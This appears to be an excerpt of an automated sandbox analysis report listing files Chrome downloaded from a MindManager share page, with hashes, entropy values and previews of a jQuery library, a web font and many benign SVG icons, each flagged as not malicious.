                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):484
                                                                Entropy (8bit):5.054710508957195
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6C87410093B9C2BBE71454BAD0090140
                                                                SHA1:22F3CB53E24420D035423C7306906FA156EE673D
                                                                SHA-256:A2138C156FEB9A5EB75B7816890ABF6971BAFC078757DE5EAD2AB552D425453D
                                                                SHA-512:7DEA7E4819DD335C11922D73F948D5ABA62A7F4923CFFAFAA8BCD03721C9FDA1DE58163B0FEBE1D239C027A9ECC2B892BB348951722CC19421CE3D15D02056C0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_info_close.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:none;stroke:#3e9eff;stroke-miterlimit:10;}</style></defs><title>topic_info_icon_info_close</title><rect class="cls-1" width="16" height="16" rx="2"/><rect class="cls-2" x="1.5" y="1.5" width="13" height="13" rx="2"/><line class="cls-2" x1="4.42" y1="10.84" x2="10.42" y2="4.84"/><line class="cls-2" x1="10.42" y1="10.84" x2="4.42" y2="4.84"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2405
                                                                Entropy (8bit):4.752829542206029
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:13E1B8F896C47D038718421D64968224
                                                                SHA1:3DA53E5F43CBEAA7F35BD1A83222883DCD5321C1
                                                                SHA-256:92EBB2DFDAD2AF8E7CB00B794E4AAA145EF4C2444DD5BACDCF36CC2E56BD8D99
                                                                SHA-512:20E4CAC81936202E81161BAF34A4A37D40FFE80AC721872581E173AED566DFE9204736245C97D1CEE11EEBABC7C24939C7BAAA394171731504BBBFA09906622D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_calculated_property.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:#4f87c6;}.cls-4{fill:#7db7ea;}.cls-5{fill:#4f8ed4;}</style></defs><title>topic_info_icon_calculated_property</title><path class="cls-1" d="M2,15.5A1.5,1.5,0,0,1,.5,14V2A1.5,1.5,0,0,1,2,.5H14A1.5,1.5,0,0,1,15.5,2V8.79L7.81,15.5Z"/><path class="cls-2" d="M14,1a1,1,0,0,1,1,1V8.57L7.63,15H2a1,1,0,0,1-1-1V2A1,1,0,0,1,2,1H14m0-1H2A2,2,0,0,0,0,2V14a2,2,0,0,0,2,2H8l8-7V2a2,2,0,0,0-2-2Z"/><rect class="cls-3" x="3" y="4" width="2" height="2"/><rect class="cls-3" x="3" y="7" width="2" height="2"/><rect class="cls-3" x="3" y="10" width="2" height="2"/><rect class="cls-2" x="6" y="5" width="3" height="1"/><path class="cls-1" d="M14,16H5V6H16v8A2,2,0,0,1,14,16Z"/><g id="Page-1"><g id="Core"><g id="settings"><g id="Shape"><path class="cls-4" d="M10.08,15.5,9.86,14l-.18-.09a2.92,2.92,0,0,0,1.15.24,3.06,3.06,0,1,0-1.37-.34,3.06,3.06,0,0,1-.62-.36l-.22
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1955
                                                                Entropy (8bit):4.091886597919438
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FF14B6AD13F2940C6A8218C0B2BFEB1A
                                                                SHA1:E4AAA2559473D1C1487D6C8ABE99221BE7CE8F97
                                                                SHA-256:FF0ADA4516DE2B1970187C76867C284CEDCF0B1AC1A6A2E8481B78F5B1409555
                                                                SHA-512:370213102F3D768A936E4CE85E4228F6CA99F190CBB37B947E95DB2B5B3B03511BDE4D7643389473BCE4147A520D93538ED73022F27E7A947690C450E88B2734
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_cog.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><path fill="#3A52A4" d="M452.515 237l31.843-18.382c9.426-5.441 13.996-16.542 11.177-27.054-11.404-42.531-33.842-80.547-64.058-110.797-7.68-7.688-19.575-9.246-28.985-3.811l-31.785 18.358a196.276 196.276 0 0 0-32.899-19.02V39.541a24.016 24.016 0 0 0-17.842-23.206c-41.761-11.107-86.117-11.121-127.93-.001-10.519 2.798-17.844 12.321-17.844 23.206v36.753a196.276 196.276 0 0 0-32.899 19.02l-31.785-18.358c-9.41-5.435-21.305-3.877-28.985 3.811-30.216 30.25-52.654 68.265-64.058 110.797-2.819 10.512 1.751 21.613 11.177 27.054L59.485 237a197.715 197.715 0 0 0 0 37.999l-31.843 18.382c-9.426 5.441-13.996 16.542-11.177 27.054 11.404 42.531 33.842 80.547 64.058 110.797 7.68 7.688 19.575 9.246 28.985 3.811l31.785-18.358a196.202 196.202 0 0 0 32.899 19.019v36.753a24.016 24.016 0 0 0 17.842 23.206c41.761 11.107 86.117 11.122 127.93.001 10.519-2.798 17.844-12.321 17.844-23.206v-36.753a196.34 196.34 0 0 0 32.899-19.019l31.785 18.358c9.41 5.435 2
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):487
                                                                Entropy (8bit):5.010367217033401
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:11C491C4EE145AD5EFE282B371968FC1
                                                                SHA1:1E35D43C36A40CFB2BD305CBD543EB2C9EB7CBF5
                                                                SHA-256:B592B3587C3D199829A5ED9E0F418CD8A6D023D586CBBD738F58387761FB2FEE
                                                                SHA-512:BEAB929A0B53E41548F7ED191447E190266F62CCD33D859DBB683BB99770664D05B11BC99451D7505F59D30E31AC498FDB783EF7E39F2618CF35BBEAAD287EB9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/flag-orange.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f8804a;}.cls-2{opacity:0.2;}</style></defs><title>flag_orange_16 copy</title><rect class="cls-1" x="1" width="1" height="16" rx="0.5" ry="0.5"/><polygon class="cls-1" points="8 11 8 4.5 16 7.75 8 11"/><polygon class="cls-1" points="8 8.5 2 10 2 1 8 2.5 8 8.5"/><rect class="cls-2" x="7" y="3" width="1" height="6"/><rect width="1" height="16" rx="0.5" ry="0.5"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                Category:downloaded
                                                                Size (bytes):43596
                                                                Entropy (8bit):7.9952701440723475
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/90CKg8E5CxJTIuRhkNPnm912sfokg5T6rIab80
                                                                Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):69795
                                                                Entropy (8bit):4.263058234116758
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:92D3A46F62CC58530B13D21D9EA13D37
                                                                SHA1:D02AF7C793AC3B7A127BC15A3015EF0D560CBB60
                                                                SHA-256:4223627DAF2FD03BB606CC9A0A9661E7347E82074311D4B13A7413EAFEA70F38
                                                                SHA-512:3B43228D3F16D469D7572B6B20A1BD64CCC8398F4C4CEDC1D833458CACF963E1BFE1C141861F1CDA060725A7CCA44E1CEC2D6D9454614D88B5279C04EB8C4227
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_project_taskmanagement.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_5617)">..<rect width="200" height="250" rx="10" fill="#CADEF7"/>..<g clip-path="url(#clip1_456_5617)">..<path opacity="0.5" d="M15.9754 177.571C13.768 157.991 22.7481 138.981 37.6581 126.767C52.568 114.552 72.8576 108.797 93.3839 108.652C120.156 108.462 148.679 118.239 167.504 138.002C186.328 157.765 193.267 187.965 180.633 209.356C174.561 219.636 163.223 227.778 150.296 226.642C137.838 225.548 126.698 216.328 114.242 215.04C91.924 212.733 75.0844 234.386 51.526 226.181C32.8329 219.669 17.9178 194.799 15.9754 177.571Z" fill="#99C3F8"/>..<path d="M165.527 86H35.8655C30.1408 86 25.5 90.6408 25.5 96.3655V188.972C25.5 194.697 30.1408 199.338 35.8655 199.338H165.527C171.252 199.338 175.893 194.697 175.893 188.972V96.3655C175.893 90.6408 171.252 86 165.527 86Z" fill="white"/>..<path d="M175.893 101.002V96.3655C175.893 95.0043 175.625 93.6564 175.104 92.3988C174.58
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):815
                                                                Entropy (8bit):5.224303591110659
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1A5157B52446C1C6FE04F9F4D67FCDC7
                                                                SHA1:0E0C0435A58A22C8B1A878ACD943D9786C28E1B2
                                                                SHA-256:1DA1E1CA047C4C606B48646A940E12299D805EA5F562F135C0ECE63942BBE0FA
                                                                SHA-512:E6315E035C30BB71C65328CB50FCF14FDD5734F515B2D97FC6DB612CA4A70DEADD0236424CD4CD1AC0360899D2645D6E9DBC1E9BE0468F5903DE1ED2CF41077F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/roPercentageDone09.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#2eb100;}.cls-2{fill:#378c37;}.cls-3{fill:#318231;}.cls-4{fill:#fff;}.cls-5{fill:gray;}</style></defs><title>roPercentageDone09</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><polygon class="cls-3" points="6 7.67 4.22 9.44 7.78 13 14 6.78 12.22 5 7.78 9.44 6 7.67"/><polygon class="cls-4" points="5 6.67 3.22 8.44 6.78 12 13 5.78 11.22 4 6.78 8.44 5 6.67"/><path class="cls-5" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-4" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1,1-1H3M2,13H3V11H2v2M3,9H2a2,2,0,0,0-2,2v1H-1v5H6V12H5V11A2,2,0,0,0,3,9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1260
                                                                Entropy (8bit):4.44522475958559
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D5E80BBFA2B5A5EA85B7B1B3F87D2B64
                                                                SHA1:2079AA6117FC52D8F9179AD795B7E21D0689C6B7
                                                                SHA-256:E0FEB24CECFFF58E2BCC4967930CDB3640584F6FBEA06CAC87AF20008CCD9409
                                                                SHA-512:F65602E0F26D09A37FF0923B81CB65893F373F2FC6D11786F4C90A611D8B14CCB4ED63B0979E99A47F1F875CE77587FAFE3148A49354F2079ABDC628BA1CC4A9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-presentation/svg/search.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 13.35 14"><defs><style>.cls-1{fill:#3a52a4;stroke:#3a52a4;stroke-miterlimit:10;}</style></defs><title>2018 Publish - search</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M12.76,13a.32.32,0,0,1,.09.23.29.29,0,0,1-.11.22.25.25,0,0,1-.1.06l-.12,0-.13,0a.28.28,0,0,1-.11-.08L8.42,9.18a4.8,4.8,0,0,1-.68.46A4.72,4.72,0,0,1,7,10a5.09,5.09,0,0,1-.79.2,5,5,0,0,1-1.79,0,4.81,4.81,0,0,1-1.75-.72,4.64,4.64,0,0,1-.74-.62,4.86,4.86,0,0,1-.61-.74,5,5,0,0,1-.45-.84,4.63,4.63,0,0,1-.28-.91,5,5,0,0,1,0-1.92,4.63,4.63,0,0,1,.28-.91,4.92,4.92,0,0,1,.45-.83,5.18,5.18,0,0,1,.61-.75A4.89,4.89,0,0,1,3.51.87,5.07,5.07,0,0,1,4.42.59a4.9,4.9,0,0,1,1.92,0,5.07,5.07,0,0,1,.91.28A4.89,4.89,0,0,1,8.82,1.93a5.18,5.18,0,0,1,.61.75,4.92,4.92,0,0,1,.45.83,4.63,4.63,0,0,1,.28.91,5,5,0,0,1,.09,1A4.87,4.87,0,0,1,9.9,7.19,4.78,4.78,0,0,1,9.48,8a5,5,0,0,1-.57.73ZM1.15,5.38A4.09,4.09,0,0,0,1.48,7,4.28,4.28,0,0,0,3.73,
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):577
                                                                Entropy (8bit):5.208225084231241
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7D427BF4EBF0C8D2672532A53D0DD12D
                                                                SHA1:2353BCF64B1F46F06B28E55E0ADE16BB6FD59ECA
                                                                SHA-256:B3AE0C67E5853A70EE32D62CE21F3953A056ECDF1FC6939C45390D8DB28B4E27
                                                                SHA-512:1BCF164A83D89DFEEE74068CF8E9B4820AF67F1FBB587FB5D661B58B2BAD752908C59D3AAAE45A0F478F1BE9434FF5EE1EF19FC2A927576E067DDC8E35F13F43
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/percentageDone08.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}</style></defs><title>percentageDone08</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8,15.5A7.49,7.49,0,0,1,2.59,2.82L8.5,8.73V.52a7.5,7.5,0,0,1-.5,15Z"/><path class="cls-4" d="M9,1.07A7,7,0,1,1,2.61,3.54L7.29,8.23,9,9.94V1.07M8,0V7.52L2.59,2.11A8,8,0,1,0,8,0Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):867
                                                                Entropy (8bit):5.40545704990285
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:30467E5B0C7A248F30D57F1348518B43
                                                                SHA1:739240E48146DC9DDDD361AFAA3DE0F61011AE3B
                                                                SHA-256:AC3CF352D74CADB2C98FB2AD421B31A3017D09B59ADC9B33E5F2CE9F8F0705B5
                                                                SHA-512:607409AF9BB8EBAF2994244BB73E8130BAB664A323E2FAF573B43BB1068AC23CBCE414E0A79745E1D377DF79630EED84F086DBE85E4A164D0CF5607F0386FD65
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/search-small.svg
                                                                Preview:<?xml version="1.0" ?><!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN'. 'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'>.<svg id="Layer_1" style="enable-background:new 0 0 64 64;" version="1.1" viewBox="0 0 64 64" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g><g id="Icon-Search" transform="translate(30.000000, 230.000000)">..<path fill="#3a52a4" stroke="#3a52a4" stroke-width="3" d="M-2.3-182.9c-10.7,0-19.5-8.7-19.5-19.5c0-10.7,8.7-19.5,19.5-19.5s19.5,8.7,19.5,19.5 C17.1-191.6,8.4-182.9-2.3-182.9L-2.3-182.9z M-2.3-219c-9.2,0-16.7,7.5-16.7,16.7c0,9.2,7.5,16.7,16.7,16.7s16.7-7.5,16.7-16.7 C14.3-211.5,6.8-219-2.3-219L-2.3-219z" id="Fill-1"/>..<polyline fill="#3a52a4" stroke="#3a52a4" stroke-width="3" points="23.7,-174.2 10.1,-187.7 12.3,-189.9 25.8,-176.3 23.7,-174.2" />.</g>.</g>.</svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):3224
                                                                Entropy (8bit):4.902841304172258
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:744E715EA915D11BD70510A75EFECF3D
                                                                SHA1:632112423CD04ADF227C35A95C0B7FA558A4CC87
                                                                SHA-256:05EC164EE90C14FA7685DD573DE73F6341CA4ED2042ED01E3516E64AE3FA265C
                                                                SHA-512:FCD1E4118E2838E31A390507E663626CA556967E8710D6A75DEE19910CFE8EE1C07C55707FC868726888D899710456214BDAA15D30F6184D7E3FFB3F84FBBACA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets-image.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24">. <g id="Group_486" data-name="Group 486" transform="translate(-484 -4)">. <path id="Path_349" data-name="Path 349" d="M918,469v-2h5l1,2h1v7h-7v-1l-2-1v-5Z" transform="translate(-417 -448)" fill="#fff"/>. <g id="Path_355" data-name="Path 355" transform="translate(-417 -448)" fill="#fff" stroke-miterlimit="10">. <path d="M 922.5 475.5 L 922 475.5 L 920 475.5 L 919.5 475.5 L 919.5 475 L 919.5 473.5 L 918 473.5 L 917.5 473.5 L 917.5 473 L 917.5 471 L 917.5 470.5 L 918 470.5 L 919.5 470.5 L 919.5 469 L 919.5 468.5 L 920 468.5 L 922 468.5 L 922.5 468.5 L 922.5 469 L 922.5 470.5 L 924 470.5 L 924.5 470.5 L 924.5 471 L 924.5 473 L 924.5 473.5 L 924 473.5 L 922.5 473.5 L 922.5 475 L 922.5 475.5 Z" stroke="none"/>. <path d="M 920 469 L 920 471 L 918 471 L 918 473 L 920 473 L 920 475 L 922 475 L 922 473 L 924 473 L 924 471 L 922 471 L 922 469 L 920 469 M 919 468 L 920 468 L 922 468 L 923 468 L 923
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):509
                                                                Entropy (8bit):5.11690232396674
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C98979FDA94DEF9554A0A504C8AA7107
                                                                SHA1:69209D47C95D12B9EF39CA84631E4276BDCC536C
                                                                SHA-256:7F9FAC1BDB4C5DF8D4FE9B7E075426839DB1D7C250999F8A624068493716C131
                                                                SHA-512:96ADEF6C6DAC0ACC1FDE1BB7537838B090D517AC6CA7F3F93C669BA56C5F25D2818E8DD0D48F9C33B281FFFCCCB5F8F8F55C8EA97587FFDBBDC81C1326C4A6AE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_undo.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 21.26 9.37"><defs><style>.cls-1{fill:#4f87c6;}</style></defs><title>context_undo</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M20.86,9.37A11.43,11.43,0,0,0,14.53,6a11.3,11.3,0,0,0-3.68-.12c-1.26.13-2.53.73-3.76.95L7,2.44a12,12,0,0,1,4.75-.22A12.06,12.06,0,0,1,16,3.33,10.1,10.1,0,0,1,19.2,5.74,10,10,0,0,1,21.26,9.1Z"/><polygon class="cls-1" points="7.73 0 0 7.73 9.36 8.82 7.73 0"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):833
                                                                Entropy (8bit):5.010957947498993
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AB0CC469EF86837D4934427799A678B2
                                                                SHA1:62DC0CFC92B478144CD574FABF8AB12CEFE2BBA9
                                                                SHA-256:C2E279CC05D566716239F81F7463BA2837F400070E5D4E2B99F8AB6B8F274BBE
                                                                SHA-512:6C9CB88335E6E46E097BDA692E4FA2FF377BF178057C408FAEFD618362AAD9850CA26CF028D08119144D3229FA36C28D51BCDFF4566A5EEAB707FF86798A3A6D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-toolbar/svg/search-close.svg
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 19.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="12px" height="12px" viewBox="-1 -1 17.5 17.5" xml:space="preserve">.<g>..<path fill="#3A52A4" stroke="#3A52A4" d="M8.6,7.8l6.8,6.8c0.1,0.1,0.2,0.3,0.2,0.4s-0.1,0.3-0.2,0.4c-0.1,0.1-0.1,0.1-0.2,0.1s-0.2,0-0.2,0...c-0.1,0-0.1,0-0.2,0s-0.1-0.1-0.2-0.1L7.8,8.6L1,15.4c-0.1,0.1-0.1,0.1-0.2,0.1s-0.1,0-0.2,0c-0.1,0-0.2,0-0.2,0s-0.1-0.1-0.2-0.1...C0.1,15.3,0,15.2,0,15s0.1-0.3,0.2-0.4L7,7.8L0.2,1C0.1,0.9,0,0.8,0,0.6s0.1-0.3,0.2-0.4S0.4,0,0.6,0S0.9,0.1,1,0.2l6.8,6.8...l6.8-6.8C14.7,0.1,14.8,0,15,0s0.3,0.1,0.4,0.2s0.2,0.3,0.2,0.4S15.6,0.9,15.4,1L8.6,7.8z"/>.</g>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1937
                                                                Entropy (8bit):4.597114556214562
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:E433CD71182AADF26422EAE172A948D8
                                                                SHA1:8F7075921E8DA275F5B3069622ED90FAD5180ECF
                                                                SHA-256:2376F1610D5AEB8C71ADA355D1073131E9C519640CF43E18F4204ABDF6730F85
                                                                SHA-512:3FA11AEA92C75FC2EF03ACBD8E540676DE161A027C31B190359139D2BCBFD76E297C9F4792732542624340DA259147DDB6B4979324B731C567831FA30431D560
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/user-manager/default_user_avatar.svg
                                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 30 30">. <defs>. <style>.cls-1{fill:#555555;}.cls-2{fill:#fff;}</style>. </defs>. <title>default user profile</title>. <g id="Layer_2" data-name="Layer 2">. <g id="Layer_1-2" data-name="Layer 1">. <g id="_Clip_Group_" data-name="&lt;Clip Group&gt;">. <circle id="_Clipping_Path_" data-name="&lt;Clipping Path&gt;" class="cls-1" cx="15" cy="15" r="15"/>. </g>. <path class="cls-2" d="M8.84,22.62a1.2,1.2,0,0,1-1.2-1.2s0-.1,0-.26a3.51,3.51,0,0,1,.11-.6,5.75,5.75,0,0,1,.29-.83,4.77,4.77,0,0,1,.56-.95,6,6,0,0,1,.47-.54,5.54,5.54,0,0,1,.54-.48,5.8,5.8,0,0,1,.61-.41,6.23,6.23,0,0,1,.68-.35,7.83,7.83,0,0,1,.93-.34,9.39,9.39,0,0,1,1-.25q.54-.1,1.13-.15t1.23-.05q.63,0,1.23.05t1.13.15a9.48,9.48,0,0,1,1,.25,7.83,7.83,0,0,1,.93.34,6.23,6.23,0,0,1,.68.35,6.07,6.07,0,0,1,.61.41,5.37,5.37,0,0,1,.54.48,5.19,5.19,0,0,1,.46.54,4.41,4.41,0,0,1,.56.95,6.06,6.06,0,0,1,.29.83,3.8,3.8,0,0,1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1194
                                                                Entropy (8bit):4.976930142513658
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EE400F0964D29C45683F72E7292C947D
                                                                SHA1:982080F86E73B06A7986134A6D3AB3D38E278AF6
                                                                SHA-256:576EDB02DEEE5282AE8E80797FB70B129A04E62ED058099F10C1F1D2AECCAB72
                                                                SHA-512:7F67AD21C602B1F00C80CC9B8EB8AB4DE2F5CE72C86ADFCA6B915472C01E1DA5213D856A36F36041BACA9450F80C02683561C48DA74F3494B3446759AC48D677
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/hourglass.svg
